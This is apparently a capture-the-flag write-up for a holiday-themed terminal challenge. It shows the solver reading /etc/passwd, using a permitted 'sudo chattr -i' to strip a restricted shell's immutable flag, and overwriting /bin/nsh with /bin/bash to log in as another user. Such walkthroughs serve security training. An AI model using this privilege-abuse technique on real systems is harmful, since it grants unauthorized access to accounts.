Location: Speaker UNpreparedness Room
nyancat, nyancat
I love that nyancat!
My shell's stuffed inside one
Whatcha' think about that?
Sadly now, the day's gone
Things to do! Without one...
I'll miss that nyancat
Run commands, win, and done!
Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt.
Target Credentials:
username: alabaster_snowball
password: Password2
elf@20165ddb66c7:~$
Alabaster's Hint talks about checking the /etc/passwd
elf@20165ddb66c7:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
elf:x:1000:1000::/home/elf:/bin/bash
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh
The last line of the file is the entry for Alabaster. The fields are:
- username
- password, which is x in this case which means refer to /etc/shadow
- uid - user id
- gid - group id
- gecos, which is normally the user's real name, but is blank here home directory
- shell - the shell that the user logs in with and we want this to be bash
Let's look at /bin/nsh
elf@20165ddb66c7:~$ ls -l /bin/nsh
-rwxrwxrwx 1 root root 75680 Dec 11 17:40 /bin/nsh
'ls' shows that it is writable by any one but trying to overwrite the file does not work. This is where Alabaster's other hint comes into play. It is necessary to look at what sudo -l will allow to be run.
elf@20165ddb66c7:~$ sudo -l
Matching Defaults entries for elf on df02af27f0de:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elf may run the following commands on df02af27f0de:
(root) NOPASSWD: /usr/bin/chattr
chattr allows us to change file attributes, so let's use lsattr to see why this might be necessary
elf@20165ddb66c7:~$ lsattr /bin/nsh
----i---------e---- /bin/nsh
/bin/nsh has the i attribute set. From the chattr man page:
A file with the 'i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode.
So let's remove the attibute …
elf@20165ddb66c7:~$ sudo chattr -i /bin/nsh
elf@20165ddb66c7:~$ lsattr /bin/nsh
--------------e---- /bin/nsh
replace the /bin/nsh with /bin/bash …
elf@20165ddb66c7:~$ cp /bin/bash /bin/nsh
check that the change has taken …
elf@20165ddb66c7:~$ ls -l /bin/bash /bin/nsh
-rwxr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
-rwxrwxrwx 1 root root 1168776 Dec 16 22:53 /bin/nsh
and login as Alabaster.
elf@20165ddb66c7:~$ su - alabaster_snowball
Password:
Loading, please wait......
You did it! Congratulations!
alabaster_snowball@20165ddb66c7:~$